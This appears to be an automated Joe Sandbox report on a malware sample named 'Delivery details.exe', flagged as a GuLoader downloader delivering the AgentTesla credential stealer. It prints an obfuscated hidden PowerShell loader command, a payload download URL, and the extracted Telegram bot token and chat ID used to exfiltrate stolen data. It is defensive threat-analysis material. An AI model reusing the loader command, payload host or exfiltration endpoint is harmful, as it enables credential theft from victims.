Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Delivery details.exe

Overview

General Information

Sample name:Delivery details.exe
Analysis ID:1409546
MD5:78ac601a2f48bc5fc7c15edb4c0fb9d7
SHA1:43096a0ab5cc82736544f5f25ff01e523ce08c2d
SHA256:f5f07d56fb08266e8109ade046a794451d86b2a3d32228ede3c096ffe8cca8ce
Tags:exeGuLoader
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected GuLoader
Yara detected Telegram RAT
Hides threads from debuggers
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Delivery details.exe (PID: 4400 cmdline: C:\Users\user\Desktop\Delivery details.exe MD5: 78AC601A2F48BC5FC7C15EDB4C0FB9D7)
    • powershell.exe (PID: 1084 cmdline: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4824 cmdline: C:\Windows\system32\cmd.exe" /c "set /A 1^^0 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 4400 cmdline: C:\Program Files (x86)\windows mail\wab.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage?chat_id=5585605185"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000006.00000002.3266183941.0000000004BC8000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              System Summary

              barindex
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1084, TargetFilename: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1084, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, ProcessId: 4824, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), CommandLine: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Delivery details.exe, ParentImage: C:\Users\user\Desktop\Delivery details.exe, ParentProcessId: 4400, ParentProcessName: Delivery details.exe, ProcessCommandLine: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), ProcessId: 1084, ProcessName: powershell.exe
              Timestamp:03/15/24-12:36:34.108520
              SID:2851779
              Source Port:49716
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: wab.exe.4400.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage"}
              Source: wab.exe.4400.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage?chat_id=5585605185"}
              Source: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exeVirustotal: Detection: 13%Perma Link
              Source: Delivery details.exeVirustotal: Detection: 13%Perma Link
              Source: Delivery details.exeReversingLabs: Detection: 13%
              Source: Delivery details.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 162.240.109.7:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: Delivery details.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\akroterion\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49716 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44ec8b632084Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44fbe5c2a9f0Host: api.telegram.orgContent-Length: 914Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc5150fe3e9d7aHost: api.telegram.orgContent-Length: 67189Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc531643bd24a9Host: api.telegram.orgContent-Length: 67189Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44ecc148ce97Host: api.telegram.orgContent-Length: 67199Expect: 100-continue
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: global trafficHTTP traffic detected: GET /AqtYsvzFN55.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mzu7.sa.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /AqtYsvzFN55.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mzu7.sa.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: mzu7.sa.com
              Source: unknownHTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44ec8b632084Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
              Source: wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.000000002146B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: http://s.symcd.com06
              Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021427000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/
              Source: wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021427000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: Delivery details.exe, Delivery details.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mzu7.sa.com/
              Source: wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3267955978.00000000057F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mzu7.sa.com/AqtYsvzFN55.bin
              Source: wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mzu7.sa.com/AqtYsvzFN55.bin2C
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownHTTPS traffic detected: 162.240.109.7:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exeJump to dropped file
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00404D900_2_00404D90
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00406ABA0_2_00406ABA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A841786_2_02A84178
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A8E5686_2_02A8E568
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A8AA106_2_02A8AA10
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A84A486_2_02A84A48
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A83E306_2_02A83E30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A8DCE86_2_02A8DCE8
              Source: Delivery details.exeStatic PE information: invalid certificate
              Source: Delivery details.exe, 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemles.exeDVarFileInfo$ vs Delivery details.exe
              Source: Delivery details.exeBinary or memory string: OriginalFilenamemles.exeDVarFileInfo$ vs Delivery details.exe
              Source: Delivery details.exe.2.drBinary or memory string: OriginalFilenamemles.exeDVarFileInfo$ vs Delivery details.exe
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
